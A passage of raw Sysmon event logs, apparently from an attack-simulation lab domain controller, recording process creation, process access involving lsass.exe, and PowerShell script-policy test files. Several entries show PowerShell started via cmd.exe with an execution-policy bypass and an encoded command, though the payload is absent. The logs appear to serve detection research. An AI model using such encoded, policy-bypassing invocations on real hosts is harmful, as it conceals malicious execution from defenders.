aa52080857\System.Management.Automation.ni.dll+e6eb3a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e95aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e95aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e9593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e8665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e93b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e9376b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e9347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e930b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e795b3b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e78363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e778d5(wow64) 154100x8000000000000000750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.510{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 
(rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.451{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.451{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:02.420{266CAFBE-6442-6064-E302-00000000AD01}3020\PSHost.132616656023650293.3020.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.420{266CAFBE-6442-6064-E302-00000000AD01}3020ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_go0qlp2x.zza.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.420{266CAFBE-6442-6064-E302-00000000AD01}3020ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ytufaihw.xpv.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.404{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ytufaihw.xpv.ps12021-03-31 12:00:02.404 10341000x8000000000000000743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.388{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.373{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.373{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.373{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.357{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-6442-6064-E202-00000000AD01}46403396C:\Windows\system32\cmd.exe{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.365{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6442-6064-E202-00000000AD01}4640C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
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 10341000x8000000000000000726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E202-00000000AD01}4640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 